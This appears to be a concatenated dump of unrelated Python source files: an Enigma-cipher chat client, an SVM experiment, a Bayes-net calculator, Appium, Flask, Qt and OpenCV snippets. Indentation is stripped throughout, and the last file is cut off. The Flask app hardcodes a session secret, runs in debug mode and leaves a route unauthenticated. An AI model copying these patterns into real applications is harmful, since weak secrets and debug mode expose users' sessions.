rotor_l1_options = OptionMenu(self.root, options_rotor_l1, *abc_lst)
rotor_l1_options.grid(row=6, column=1, columnspan=3, padx=15)
second_rotor_label_letter = Label(self.root, text="second Rotor",
font=self.text_font, bg=self.bg_color)
second_rotor_label_letter.grid(row=5, column=4, columnspan=3)
options_rotor_l2 = StringVar()
options_rotor_l2.set(rotor2_letter)
rotor_l2_options = OptionMenu(self.root, options_rotor_l2, *abc_lst)
rotor_l2_options.grid(row=6, column=4, columnspan=3, padx=15)
third_rotor_label_letter = Label(self.root, text="Third Rotor",
font=self.text_font, bg=self.bg_color)
third_rotor_label_letter.grid(row=5, column=7, columnspan=3)
rotors_letters = Label(self.root, text="the letters on the rotors",
font=self.title_font, bg=self.bg_color)
rotors_letters.grid(row=4, column=3, columnspan=5, pady=5)
options_rotor_l3 = StringVar()
options_rotor_l3.set(rotor3_letter)
rotor_l3_options = OptionMenu(self.root, options_rotor_l3, *abc_lst)
rotor_l3_options.grid(row=6, column=7, columnspan=3, padx=15)
plugboard_title = Label(self.root, text="Plugboard settings",
font=self.title_font, bg=self.bg_color)
plugboard_title.grid(row=7, column=3, columnspan=5, pady=5)
plugboard_note = Label(self.root, text="Plugboard can contain 10 pairs max",
bg=self.bg_color, font=self.text_font)
plugboard_note.grid(row=8, column=3, columnspan=5, pady=5)
lst_buttons = []
for i in range(65, 74):
plugboard_letter = Button(self.root, text=" " + chr(i) + " ", font=self.text_font,
bg="khaki", relief=RIDGE, height=2, width=3,
command=lambda letter=chr(i):
self.add_letter_in_plugboard(letter, lst_buttons))
plugboard_letter.grid(row=9, column=i - 64, pady=5, padx=5)
lst_buttons.append(plugboard_letter)
for i in range(74, 83):
plugboard_letter = Button(self.root, text=" " + chr(i) + " ", font=self.text_font,
bg="khaki", relief=RIDGE, height=2, width=3,
command=lambda letter=chr(i):
self.add_letter_in_plugboard(letter, lst_buttons))
plugboard_letter.grid(row=10, column=i - 73, pady=5, padx=5)
lst_buttons.append(plugboard_letter)
for i in range(83, 91):
plugboard_letter = Button(self.root, text=" " + chr(i) + " ", font=self.text_font,
bg="khaki", relief=RIDGE, height=2, width=3,
command=lambda letter=chr(i):
self.add_letter_in_plugboard(letter, lst_buttons))
plugboard_letter.grid(row=11, column=i - 82, pady=5, padx=5)
lst_buttons.append(plugboard_letter)
self.set_plugboard(lst_buttons)
button_save_settings = Button(self.root, text="save settings and go to simulator",
height=2, width=35, font=self.text_font,
command=lambda: self.save_settings(options_rotor1.get(),
options_rotor2.get(),
options_rotor3.get(),
options_rotor_l1.get(),
options_rotor_l2.get(),
options_rotor_l3.get()))
button_save_settings.grid(row=12, column=0, columnspan=10, rowspan=2, pady=20, padx=5)
def save_settings(self, rotor_num1, rotor_num2, rotor_num3, rotor_l1, rotor_l2, rotor_l3):
"""
this function saves the changes in the simulator settings made by the user.
:param rotor_num1:
:param rotor_num2:
:param rotor_num3:
:param rotor_l1:
:param rotor_l2:
:param rotor_l3:
:return:
"""
dict_rotor_num = {"I": 1, "II": 2, "III": 3, "IV": 4, "V": 5}
label_txt = ""
rotor_num1 = dict_rotor_num[rotor_num1]
rotor_num2 = dict_rotor_num[rotor_num2]
rotor_num3 = dict_rotor_num[rotor_num3]
if rotor_num1 == rotor_num2 or rotor_num1 == rotor_num3 or rotor_num2 == rotor_num3:
label_txt = "rotor can not be used more than once at a time"
if label_txt == "":
self.simulator((rotor_num1, rotor_num2, rotor_num3, rotor_l1, rotor_l2, rotor_l3), 1)
else:
error_label = Label(self.root, text=label_txt, font=self.text_font, bg=self.bg_color)
error_label.grid(row=14, column=0, columnspan=10, pady=10)
def add_letter_in_plugboard(self, letter, lst_buttons):
"""
this function adds a letter to the plugboard
:param letter:
:param lst_buttons:
:return:
"""
self.simulator_enigma.plugboard.add_letter(letter)
self.set_plugboard(lst_buttons)
def set_plugboard(self, lst_buttons):
"""
this function sets the plugboard in the simulator
settings and lets the user edit it.
:param lst_buttons:
:return:
"""
colors = ['purple', 'yellow', 'blue', 'orange', 'coral4', 'pink', 'cyan',
'SpringGreen2', 'red', 'green']
used_colors = list(filter(lambda button_bg: button_bg != "khaki",
[i['bg'] for i in lst_buttons]))
for i in range(len(lst_buttons)):
if chr(i + 65) not in self.simulator_enigma.plugboard.plugboard1 and \
chr(i + 65) not in self.simulator_enigma.plugboard.plugboard2:
lst_buttons[i].config(bg="khaki")
for i in range(len(self.simulator_enigma.plugboard.plugboard1)):
if lst_buttons[ord(self.simulator_enigma.plugboard.plugboard1[i]) - 65]['bg'] \
== "khaki" or \
lst_buttons[ord(self.simulator_enigma.plugboard.plugboard2[i]) - 65]['bg'] \
== "khaki":
color_index = 0
while used_colors.count(colors[color_index]) == 2:
color_index += 1
lst_buttons[ord(self.simulator_enigma.plugboard.plugboard1[i]) - 65]. \
config(bg=colors[color_index])
used_colors.append(colors[color_index])
if self.simulator_enigma.plugboard.plugboard2[i] is not None:
lst_buttons[ord(self.simulator_enigma.plugboard.plugboard2[i]) - 65]. \
config(bg=colors[color_index])
used_colors.append(colors[color_index])
def show_simulator_encryption(self, rotors_settings, plugboard_settings, plain_text,
letter_number=1):
"""
this function shows the encryption process in the enigma.
:param rotors_settings:
:param plugboard_settings:
:param plain_text:
:param letter_number:
:return:
"""
self.clear_screen()
if len(self.simulator_encryption) > 0:
user_label = Label(self.root, text="Hello " + self.username,
font=self.text_font, bg=self.bg_color)
user_label.grid(pady=5, row=0, column=0, columnspan=5)
lbl_encryption = Label(self.root,
text="Encrypting The Letter: " +
self.simulator_encryption[letter_number - 1][1][0],
font=self.text_font, bg=self.bg_color)
lbl_encryption.grid(row=1, column=0, columnspan=5, pady=5, padx=10)
# text widget to display the stages of the encryption written
encryption_text_widget = Text(self.root, width=30, height=19,
bg="khaki", font=self.text_font)
encryption_text_widget.grid(row=2, rowspan=7, column=0,
columnspan=5, padx=10, pady=5)
encryption_text_widget.insert(END, self.simulator_encryption[letter_number - 1][0])
encryption_text_widget.config(state=DISABLED)
# setting canvas to display the encryption visually
encryption_stages_list = self.simulator_encryption[letter_number - 1][1]
show_canvas = ShowEncryption(self.root, encryption_stages_list)
show_canvas.set_canvas()
# setting a next/previous button if necessary
if len(self.simulator_encryption) > letter_number:
next_button = Button(self.root, width=20, height=2,
text="Next Letter", font=self.text_font,
command=lambda:
self.show_simulator_encryption(rotors_settings,
plugboard_settings,
plain_text,
letter_number + 1))
next_button.grid(row=11, column=0, columnspan=5, padx=10, pady=5)
if letter_number > 1:
previous_button = Button(self.root, width=20, height=2,
text="Previous Letter", font=self.text_font,
command=lambda:
self.show_simulator_encryption(rotors_settings,
plugboard_settings,
plain_text,
letter_number - 1))
previous_button.grid(row=9, column=0, columnspan=5, padx=10, pady=5)
else:
# no letters were encrypted
lbl_encryption = Label(self.root, text="No Letters Have Been Encrypted",
font=self.text_font, bg=self.bg_color)
lbl_encryption.grid(row=0, column=0, columnspan=5, pady=10, padx=10)
button_go_back = Button(self.root, text="go back to simulator", font=self.text_font,
height=2, width=20,
command=lambda: self.simulator(rotors_settings,
plugboard_settings, plain_text))
button_go_back.grid(row=10, column=0, columnspan=5, padx=10, pady=5)
def about_screen(self):
"""
this function shows the About the Project window.
it shows information regarding the project.
:return:
"""
self.clear_screen()
user_label = Label(self.root, text="Hello " + self.username,
font=self.title_font, bg=self.bg_color, height=2)
user_label.pack(pady=10, padx=50)
about_text = """My name is Jasmin, I am 17 years old and this is my final project
for 12th grade in the Cyber Bagrut.
The project contains a multi client-server connection.
The project includes Enigma simulator and explanations about the encryption.
It allows chatting between all the connected users.
Logging in and signing in is through the server.
the client sends the user data to the server with RSA encryption,
and the server responds appropriately.
Encryption key of messaging is changed every 10 minutes according to the
database enigma settings. the user can also send a message through the
simulator, using whichever settings he wants. the setting key
(time/settings from the simulator) are sent with RSA encryption.
the encryption of a message is done with the Enigma machine and
Morse code combined with ASCII afterwards."""
lbl_about = Label(self.root, text="About The Project",
font=self.title_font, bg=self.bg_color)
lbl_about.pack(pady=5, padx=10)
about_frame = Frame(self.root, width=100, height=300, bg='white')
about_frame.pack(padx=30, pady=20)
text_widget = Text(about_frame)
text_widget.pack()
text_widget.insert(END, about_text)
text_widget.config(state=DISABLED)
button_send = Button(self.root, text="go back to choose path", font=self.text_font,
height=2, width=20, command=self.choose_path)
button_send.pack(pady=20)
def clear_screen(self):
"""
clears the screen from widgets.
:return:
"""
lst_grid = self.root.grid_slaves()
for widget in lst_grid:
widget.destroy()
lst_pack = self.root.pack_slaves()
for widget in lst_pack:
widget.destroy()
def receive(self):
"""
this is a thread method.
it receives messages from sever and then decrypts them.
:return:
"""
print("waiting for messages")
finish = False
morse_object = Morse()
while not finish:
enigma_sim = Enigma()
try:
chunks = []
bytes_recd = 0
msg_length = loads(self.my_socket.recv(8000))
while bytes_recd < msg_length:
chunk = self.my_socket.recv(min(msg_length - bytes_recd, 2048))
if chunk == b'':
raise RuntimeError("socket connection broken")
chunks.append(chunk)
bytes_recd = bytes_recd + len(chunk)
encryption_data = loads(self.my_socket.recv(500))
encryption_data = self.rsa_object.decrypt(encryption_data).decode()
enigma_sim.rotors.set_rotors(int(encryption_data[0]), int(encryption_data[1]),
int(encryption_data[2]), encryption_data[3],
encryption_data[4], encryption_data[5])
plugboard1_str = encryption_data[6:(len(encryption_data) - 6) // 2 + 6]
plugboard2_str = encryption_data[(len(encryption_data) - 6) // 2 + 6:]
for i in range(len(plugboard1_str)):
enigma_sim.plugboard.add_letter(plugboard1_str[i])
enigma_sim.plugboard.add_letter(plugboard2_str[i])
msg = b''.join(chunks).decode()
msg, username = msg.split(";")
msg_dec = enigma_sim.decrypt_encrypt_text(morse_object.
decrypt(msg))
self.msg_list.append([msg_dec, encryption_data, username])
if self.refresh_button is not None:
self.refresh_button.configure(fg="red")
except ConnectionResetError:
finish = True
def send(self, text_box, rotors_settings=None, plugboard_settings=None):
"""
send a message to the rest of the clients. if from the
send box - encrypts according to the time.
otherwise, from the simulator - encrypts according to its settings.
:param text_box:
:param rotors_settings:
:param plugboard_settings:
:return:
"""
morse_instance = Morse()
enigma_sim = Enigma()
if plugboard_settings is None and rotors_settings is None:
enigma_sim.set_random_settings()
else:
enigma_sim.rotors.set_rotors(rotors_settings[0], rotors_settings[1], rotors_settings[2],
rotors_settings[3], rotors_settings[4], rotors_settings[5])
for i in range(len(plugboard_settings[0])):
enigma_sim.plugboard.add_letter(plugboard_settings[0][i])
enigma_sim.plugboard.add_letter(plugboard_settings[1][i])
encryption_data_rotors = ""
for i in enigma_sim.rotors.get_initial_setting():
encryption_data_rotors += str(i)
encryption_data_p1 = ""
for i in enigma_sim.plugboard.plugboard1:
encryption_data_p1 += i
encryption_data_p2 = ""
for i in enigma_sim.plugboard.plugboard2:
encryption_data_p2 += i
encryption_data = encryption_data_rotors + encryption_data_p1 + encryption_data_p2
my_msg = text_box.get("1.0", END)
text_box.delete('1.0', END)
msg = self.manage_text(my_msg)
if msg != "":
msg_to_send = morse_instance.encrypt(enigma_sim.decrypt_encrypt_text(msg))
total_sent = 0
msg_length = len(msg_to_send)
self.my_socket.send(dumps(msg_length))
while total_sent < msg_length:
sent = self.my_socket.send(msg_to_send[total_sent:].encode())
if sent == 0:
raise RuntimeError("socket connection broken")
total_sent = total_sent + sent
self.my_socket.send("encryption data;".encode())
self.my_socket.send(self.rsa_object.encrypt(encryption_data.encode(), self.server_key))
@staticmethod
def manage_text(msg):
"""
this function customizes the text so it can be encrypted.
:param msg:
:return:
"""
msg = msg.upper()
msg_final = ""
for i in msg:
if i.isalpha():
msg_final += i
return msg_final
if __name__ == '__main__':
client = Client()
|
22,492 | 2920f5581469ce5c16f22646b87e795195f254a9 | from svmutil import *
import math
import numpy as np
import matplotlib.pyplot as plt
value = 8
C = [-6, -4, -2, 0, 2]
def main():
f = open("features.train", "r")
y = []
x = []
for line in f:
line = line.strip().split()
if line == '':
break
if float(line[0]) == value:
ans = 1
else:
ans = -1
tmp = []
tmp.append(float(line[1]))
tmp.append(float(line[2]))
y.append(ans)
x.append(tmp)
f.close()
f = open("features.test", "r")
y_test = []
x_test = []
for line in f:
line = line.strip().split()
if line == '':
break
if float(line[0]) == value:
ans = 1
else:
ans = -1
tmp = []
tmp.append(float(line[1]))
tmp.append(float(line[2]))
y_test.append(ans)
x_test.append(tmp)
f.close()
alphas = []
for c in C:
prob = svm_problem(y, x)
param = svm_parameter('-t 1 -d 2 -c ' + str(math.pow(10, c)))
m = svm_train(prob, param)
y_alpha = np.array(m.get_sv_coef());
alpha = 0
for mem in y_alpha:
alpha += abs(mem)
print alpha
alphas.append(alpha)
# sv_matrix = []
# for sv in svs:
# sv_matrix.append([sv[1], sv[2]])
# w = np.dot(np.transpose(y_alpha), sv_matrix)
# norm_w = math.sqrt(math.pow(w[0][0], 2) + math.pow(w[0][1], 2))
# print norm_w
# W.append(norm_w)
print alphas
plt.plot(C, alphas)
plt.title("17.")
plt.xlabel("log(10)C")
plt.ylabel("sigma(alpha)")
plt.show()
if __name__ == '__main__':
main() |
22,493 | 0e5abb1942bf05e17e9af13c84ad2ac536353b94 | # -*- coding: utf-8 -*-
"""
ontraportlib.models.type_13_enum
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ) on 11/14/2017
"""
class Type13Enum(object):
"""Implementation of the 'Type13' enum.
TODO: type enum description here.
Attributes:
SINGLE: TODO: type description here.
SUBSCRIPTION: TODO: type description here.
ONE_TIME: TODO: type description here.
PAYMENT_PLAN: TODO: type description here.
"""
SINGLE = 'single'
SUBSCRIPTION = 'subscription'
ONE_TIME = 'one_time'
PAYMENT_PLAN = 'payment_plan'
|
22,494 | 623b5b35cb6e955ed06459dac6340e8ae0be6bc9 |
"""
Compute joint probabilities and pseudo-likelihood estimate for a Bayes Net according to
random selection semantics from a database.
Written in haste---bugs likely remain! It's also been eight months since I wrote real
python, so some things might be more concisely expressed using standard idioms.
Improvements to make:
1. Before doing anything, check global consistancy (functor names, constants, ...)
2. Currently assumes a single domain. Extending to multiple domains is easy but tedious.
3. The algorithm for generating all possible groundings (generateCombos) is far too limited.
Written in old-skool python 2.7 by Ted Kirkpatrick, March 2013.
"""
import copy
import math
class Node (object):
"""
A functor, including its value. Nodes in a Bayes Net structure have unspecified values (IN_TREE), while
nodes used for querying have QUERY values.
"""
IN_TREE = '-'
QUERY = '?'
def __init__ (this, functor, varList, val):
this.functor = functor
this.varList = varList
this.val = val
def __str__ (this):
return this.functor+"("+",".join(this.varList)+") = "+str(this.val)
def __repr__ (this):
return str(this)
""" No used, no more
def match (this, node, grounding):
if not node.isLiteralNode():
raise Exception ("Attempt to match nonprobability Node "+str(node)+" with probability value")
if this.functor != node.functor:
return (False,0)
else:
for (var,val) in zip(node.varList, this.varList):
if val != grounding.val(var):
return (False,(var,val))
return (True, this.val)
"""
def eq(this, node):
return this.functor == node.functor and this.varList == node.varList and this.val == node.val
def isLiteralNode(this):
return this.val != Node.QUERY and this.val != Node.IN_TREE
def isQueryNode(this):
return this.val == Node.QUERY
class Rule (object):
""" A rule specifying a conditional probability (the class is likely misnamed) """
def __init__ (this, child, parentList, prob):
this.child = child
this.parentList = parentList
this.prob = prob
def __str__(this):
return "P("+str(this.child)+" | "+",".join([str(n) for n in this.parentList])+") = "+str(this.prob)
class Grounding (object):
""" A specific assignment of constants to variables """
def __init__ (this, varList):
this.varList = varList
def val (this, var):
for (v, ground) in this.varList:
if v == var:
return ground
else:
raise Exception ("Var not ground: " + var)
def groundNode (this, node):
gndList = []
for var in node.varList:
gndList.append(this.val(var))
return Node (node.functor, gndList, node.val)
def __repr__(this):
return ", ".join(v[0]+"="+str(v[1]) for v in this.varList)
class Database (object):
""" The database, specifying the functor values for given arguments """
def __init__ (this, attrs):
this.attributes = attrs
def funcVal(this, node):
if node.isLiteralNode():
raise Exception ("Attempted to match nonquery Node "+str(node)+" probability")
for n in this.attributes:
if n.functor == node.functor and all ([p[0]==p[1] for p in zip(n.varList,node.varList)]):
return n.val
else:
raise Exception ("Functor not ground: " + node)
class NetNode (object):
"""
A node within a Bayes net. In addition to the functor description (Node), this has a list of parent Nodes.
"""
def __init__(this, node, parents):
this.node = node
this.parents = parents
def __str__(this):
return str(this.node)+" <- ("+", ".join([str(sn) for sn in this.parents])+")"
class BayesNet (object):
""" The Bayes net """
def __init__(this):
this.nodes = []
def append(this, netNode):
for child in netNode.parents:
if child not in this.nodes:
raise Exception ("BayesNet node " + str(netNode) + " added but child " + str (child) + " not already in net")
this.nodes.append(netNode)
def jointProbs(this, grounding, db, ruleSet):
probs = []
joint = 1.0
for node in this.nodes:
#print "searching",node
gn = fillNode(node.node, grounding, db)
#print "filled node", gn
gcn = [fillNode(n.node, grounding, db) for n in node.parents]
#print "filled parents", gcn
p = ruleMatch(ruleSet, gn, gcn)
if p == -1:
p = default(gn.functor)
probs.append((gn, p))
joint *= p
probs.append(joint)
probs.append(math.log(joint))
return probs
def variableList(this):
vars = set()
for n in this.nodes:
for v in n.node.varList:
vars.add(v)
return sorted(list(vars))
def query (node, grounding, db):
""" Ground a node and look it up in the db """
return db.funcVal(grounding.groundNode(node))
def fillNode(node, grounding, db):
""" Return a grounded node, with the value for its functor according to db """
gn = copy.deepcopy(node)
gn.val = query(gn, grounding, db)
return gn
def ruleMatch (ruleSet, node, parents):
"""
Locate the value for a grounded node and its parents in a rule set, return -1 if not found.
For functors with binary ranges, when all parents match but child's value does not, return 1-prob for other value.
"""
def getProb (node):
for rule in ruleSet:
#print rule
if (rule.child.eq(node) and
len(rule.parentList)==len(parents) and
all([n[0].eq(n[1]) for n in zip(rule.parentList,parents)])):
#print "winning eq", [n for n in zip(rule.parentList,parents)]
return rule.prob
else:
return -1
prob = getProb (node)
if prob == -1 and functorRangeSize(node.functor) == 2:
tn = copy.copy(node)
tn.val = functorOtherValue(tn.functor, tn.val)
prob = getProb (tn)
if prob != -1:
return 1 - prob
else:
return prob
return prob
def default(functor):
""" Return default uniform distribution for the range of a functor """
return 1.0/functorRangeSize(functor)
def functorRange(functor):
""" Look up the range for a functor """
for (name, range) in functorRangeList:
if functor == name:
return range
else:
raise Exception ("Functor " + functor + " not present in range list")
def functorRangeSize(functor):
""" Return cardinality of range for a functor """
return len(functorRange(functor))
def functorOtherValue(functor, val):
""" For functors with a binary range, return the other element """
range = functorRange(functor)
assert len(range) == 2
if val == range[0]:
return range[1]
else:
return range[0]
def atomList(joints):
""" Return the atoms, derived from the first entry in the joint probability table """
assert len(joints) > 0
first = joints[0]
functorList = first[1][:-2] # Second element of row, last two elements of that are joint prob and log prob
atomList = []
for (node,_) in functorList:
atomList.append(node.functor+"("+",".join(node.varList)+")")
return atomList
def jointProbabilities(constants, db, ruleList, bn):
""" Compute the joint probabilities for all combinations of values """
vars = bn.variableList()
combs = generateCombos(vars, constants)
joints = []
for grounding in combs:
joints.append((grounding, bn.jointProbs(grounding, db, ruleList)))
return (vars, atomList(joints), joints)
def generateCombos(vars,constants):
""" Generate all possible groundings (assignments of constants to variables) """
# SUPER NOT GENERALIZED---TOO LATE AT NIGHT FOR ME TO DO RECURSIVE ALGORITHMS
assert len(vars) == 2 and len(constants) == 2
combs = []
for c1 in constants:
for c2 in constants:
combs.append(Grounding([(vars[0], c1), (vars[1], c2)]))
return combs
def formatJointTableForLaTeX(joints):
"""
` Given a joint probability table, format it for LaTeX.
This function will have to be tailored for every paper.
This function simply generates the {tabular} part of the table. The prologue and epilogue,
including the caption and label, must be specified in the including file.
"""
(varList, atoms, probs) = joints
cols = len(varList) + len (probs[0][1])
with open("table1.tex","w") as out:
out.write ("\\begin{tabular}{|" + "|".join(["c"]*(cols-2))+"||c|c|}\n")
out.write ("\\hline\n")
# Table header
out.write (" & ".join(varList) + " & " + " & ".join([a for a in atoms]) + " & Joint $p$ & ln~$p$ \\\\ \\hline\n")
# Table rows
logps = []
for (grounding, probs) in probs:
out.write (" & ".join([val for (var, val) in grounding.varList]) + " & " +
" & ".join([str(n.val)+" ({:.1f})".format(p) for (n,p) in probs[:-2]]) +
" & {:.2f}".format(probs[-2]) + " & {:.2f}".format(probs[-1]) + "\\\\\n")
logps.append(probs[-1])
# A line to indicate there are further entries in the DB
out.write(" & ".join(["\ldots"]*cols) + "\\\\\n")
# Close environment
out.write ("\\hline\n\\end{tabular}\n")
with open("tab1plogp.tex","w") as plogp:
plogp.write("\\newcommand{\\pseudologp}{"+"{:.2f}".format(sum(logps)/len(logps))+"}\n")
# ---- The system that we are analyzing ----
# Bayes net structure
gY = NetNode(Node('g',['Y'],Node.IN_TREE),[])
fXY = NetNode(Node('F',['X','Y'],Node.IN_TREE),[])
gX = NetNode(Node('g',['X'],Node.IN_TREE),[gY,fXY])
cX = NetNode(Node('cd',['X'],Node.IN_TREE),[gX])
bn = BayesNet()
bn.append(gY)
bn.append(fXY)
bn.append(gX)
bn.append(cX)
# Conditional probabilities for the above net (incomplete---see defaultFunctorVals for remaining cases)
cdM = Rule(Node ('cd', ['X'], 'T') , [Node('g', ['X'], 'M')], 0.6)
cdF = Rule(Node ('cd', ['X'], 'T') , [Node('g', ['X'], 'W')], 0.8)
gW = Rule(Node('g', ['X'], 'W'), [Node('g', ['Y'], 'M'), Node('F', ['X', 'Y'], 'T')], 0.7)
gM = Rule(Node('g', ['X'], 'M'), [Node('g', ['Y'], 'W'), Node('F', ['X', 'Y'], 'T')], 0.3)
ruleList = [cdM,cdF,gW,gM]
# Debugging cases
#gyParents = Rule(Node('g', ['Y'],'M'),[Node('cd',['X'],'T')],0.2)
#gY = Rule(Node('g', ['Y'], 'M'), [], .4)
# Ranges for functors
booleanRange = ['T', 'F']
functorRangeList = [('F', booleanRange), ('g', ['M', 'W']), ('cd', booleanRange)]
# The database
# All constant arguments to functionals must come from the population given in constants
db = Database([Node('F',['anna','bob'],'T'),
Node('F',['bob','anna'],'T'),
Node('F',['bob','bob'],'F'),
Node('F',['anna','anna'],'F'),
Node('g',['bob'],'M'),
Node('g',['anna'],'W'),
Node('cd',['anna'],'T'),
Node('cd',['bob'],'F')
])
# The constants---a single population, from which all variables are drawn (with replacement)
constants = ['anna', 'bob']
"""
grounding = Grounding([('X','anna'), ('Y','bob')])
print "bob's gender", query (Node('g',['Y'],Node.QUERY), grounding, db)
print "F(anna,bob)", query (Node('F',['X','Y'],Node.QUERY), grounding, db)
print "F(bob,bob)", query (Node('F',['Y','Y'],Node.QUERY), grounding, db)
bn.jointProbs(grounding, db, ruleList)
"""
#print jointProbabilities(constants, db, ruleList, bn)
formatJointTableForLaTeX(jointProbabilities(constants, db, ruleList, bn))
|
22,495 | 022c6a7107ad09f621f523541bf9b25703461838 | import time
import page
from bases.base import Base
class LoginPage(Base):
def agree(self):
# 点击同意
self.click(page.agree_btn)
def login(self, username, pwd):
# 点击密码登录
self.click(page.pwd_login_link)
# 输入账号
self.input(page.phone_num_input, username)
# 输入密码
self.input(page.pwd_input, pwd)
# 点击登录
self.click(page.login_next_btn)
def goto_my(self):
# 点击我的
self.click(page.my_btn)
def goto_setting(self):
# 点击设置
self.click(page.setting_btn)
def logout(self):
# 点击退出登录
self.click(page.logout_btn)
# 点击确定
self.click(page.logout_confirm_btn)
# 获取登录错误提示文本/toast
def get_error_text(self, toast):
if self.element_is_exist(page.error_txt):
return self.find_element(page.error_txt).text
else:
return self.driver.find_element_by_xpath(f"//*[contains(@text,'{toast}')]").text
def screenshot(self):
self.driver.get_screenshot_as_file("../image/{}.png".format(time.strftime("%Y_%m_%d %H_%M_%S")))
def login_if_success(self):
return self.element_is_exist(page.my_btn)
def logout_if_success(self):
return self.element_is_exist(page.pwd_login_link)
|
22,496 | bbc78cea182b9adb51c233b852d609c9fc27c1c2 | import uuid
import os
from flask import Flask,render_template,request,redirect, url_for,make_response
from flask_sqlalchemy import SQLAlchemy
from flask_login import login_user, login_required, current_user, logout_user
from werkzeug.middleware.shared_data import SharedDataMiddleware
from werkzeug.security import generate_password_hash, check_password_hash
from werkzeug.utils import secure_filename
from sqlalchemy import Column, Integer, String, ForeignKey
from database import init_db,db_session,Base
from login import login_manager
from models import User,Topic,Post
from utils import validate_file_type, split_in_groups, generate_room_id
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'
login_manager.init_app(app)
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = True
app.secret_key = "nikola"
db = SQLAlchemy(app)
init_db()
@app.teardown_appcontext
def shutdown_context(exception=None):
db_session.remove()
"""
class User(Base):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key = True)
username = db.Column(String(80), unique=True,nullable="False")
password = db.Column(String(120), unique=True,nullable="False")
def __repr__(self):
return '<User %r>' % self.username
"""
@app.route('/register', methods = ['POST', 'GET'])
def register():
if request.method == 'GET':
return render_template('register.html')
else:
username = request.form['username']
password = generate_password_hash(request.form['password'])
user = User(username=username, password=password)
db_session.add(user)
db_session.commit()
return redirect(url_for("login"))
@app.route('/login', methods=['GET', 'POST'])
def login():
response = None
if request.method == 'GET':
response = make_response(render_template('login.html',user = current_user))
else:
response = make_response(redirect(url_for('mainPage')))
user = User.query.filter_by(username=request.form['username']).first()
if user and check_password_hash(user.password, request.form['password']):
user.login_id = str(uuid.uuid4())
db_session.commit()
login_user(user)
return response
@app.route("/logout")
@login_required
def logout():
current_user.login_id = None
db_session.commit()
logout_user()
return redirect(url_for('login'))
@app.route("/topic",methods = ['GET','POST'])
def topic():
if request.method == 'GET':
return render_template("topic.html")
else:
title = request.form['Title']
description = request.form['description']
topic = Topic(name= title,description = description)
db_session.add(topic)
db_session.commit()
return redirect(url_for('mainPage'))
@app.route('/', methods = ['GET'])
def mainPage():
topics = Topic.query.all()
return render_template("mainpage.html",user=current_user,topics = topics)
#return redirect(url_for('login'))
if __name__ == "__main__":
app.run(debug=True)
|
22,497 | 19218445861aa5ba1c8356ac9a3b8f0ca81694d4 | from python_qt_binding.QtCore import Qt
from python_qt_binding.QtGui import QIcon
try:
from python_qt_binding.QtGui import QLineEdit, QToolButton, QStyle
except:
from python_qt_binding.QtWidgets import QLineEdit, QToolButton, QStyle
class EnchancedLineEdit(QLineEdit):
def __init__(self, parent=None):
QLineEdit.__init__(self, parent)
# Create a clear button with icon
self.clearBtn = clearBtn = QToolButton(self)
icon = QIcon.fromTheme("edit-clear", QIcon(":/icons/crystal_clear_button_close.png"))
clearBtn.setIcon(icon)
clearBtn.setCursor(Qt.ArrowCursor)
clearBtn.setStyleSheet("QToolButton { border: none; padding: 0px; }")
clearBtn.hide()
# signals, clear lineEdit if btn pressed; change btn visibility on input
clearBtn.clicked.connect(self.clear)
self.textChanged[str].connect(self.update_close_button)
frameWidth = self.style().pixelMetric(QStyle.PM_DefaultFrameWidth)
self.setStyleSheet("QLineEdit { padding-right: %dpx; } " % (clearBtn.sizeHint().width() + frameWidth + 1))
msz = self.minimumSizeHint()
self.setMinimumSize(max(msz.width(), clearBtn.sizeHint().height() + frameWidth * 2 + 2),
max(msz.height(), clearBtn.sizeHint().height() + frameWidth * 2 + 2))
def resizeEvent(self, event):
sz = self.clearBtn.sizeHint()
frameWidth = self.style().pixelMetric(QStyle.PM_DefaultFrameWidth)
self.clearBtn.move(self.rect().right() - frameWidth - sz.width(),
(self.rect().bottom() + 1 - sz.height()) / 2)
def update_close_button(self, text):
self.clearBtn.setVisible(True if text else False)
def keyPressEvent(self, event):
'''
Enable the ESC handling
'''
if event.key() == Qt.Key_Escape and self.text():
self.setText('')
else:
event.accept()
QLineEdit.keyPressEvent(self, event)
|
22,498 | ab05334f871def1a67a46c536e5d2894745fbc0e | import cv2
import numpy as np
from collections import OrderedDict
import tracker as tracker
class Colores:
blue_lower = np.array([100,100,23], np.uint8)
blue_upper = np.array([125,255,255], np.uint8)
# yellow_lower = np.array([15,100,20], np.uint8)
# yellow_upper = np.array([45,255, 255], np.uint8)
yellow_lower = np.array([20, 100, 100])
yellow_upper = np.array([30, 255, 255])
red1_lower = np.array([0,100,20], np.uint8)
red1_upper = np.array([5,255,255], np.uint8)
red2_lower = np.array([175,100,20], np.uint8)
red2_upper = np.array([179,255,255], np.uint8)
greenLower = (29, 86, 6)
greenUpper = (64, 255, 255)
colores = ['blue', 'yellow', 'red']
masks = [0, 0, 0]
total = [0, 0, 0]
border_colors = [(255,0,0), (0,255,255), (0,0,255)]
def __init__(self):
self.cap = cv2.VideoCapture(0)
self.frame = None
self.tracker = tracker.Tracker()
def start(self):
while True:
ret, self.frame = self.cap.read()
self.frame = cv2.flip(self.frame, cv2.ROTATE_90_CLOCKWISE) # Rota la imagen 90 degrees
self.rects = []
frameHSV = self.setHSVColorModel()
self.maskFrame(frameHSV)
self.dibujarContornos()
self.tracker.update(self.rects)
self.total = self.tracker.setTrackeableObjects(self.total)
self.markObjects()
self.showResults()
if ret == True:
cv2.imshow('Frame', self.frame)
if cv2.waitKey(1) & 0xFF == ord('s'):
break
self.destroy()
def markObjects(self):
for (objectID, coords) in self.tracker.getObjects():
text = "ID {}".format(objectID)
cv2.putText(self.frame, text, (coords[1] + 10, coords[2]),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)
self.dibujarPunto(coords[1], coords[2])
def showResults(self):
for i in range(len(self.colores)):
text = "{}: {}".format(self.colores[i], self.total[i])
cv2.putText(self.frame, text, (10, ((i * 20) + 20)),
cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)
def setHSVColorModel(self):
return cv2.cvtColor(self.frame, cv2.COLOR_BGR2HSV)
def maskFrame(self, frameHSV):
self.masks[0] = cv2.inRange(frameHSV, self.blue_lower, self.blue_upper)
self.masks[1] = cv2.inRange(frameHSV, self.yellow_lower, self.yellow_upper)
self.masks[2] = cv2.add(
cv2.inRange(frameHSV, self.red1_lower, self.red1_upper),
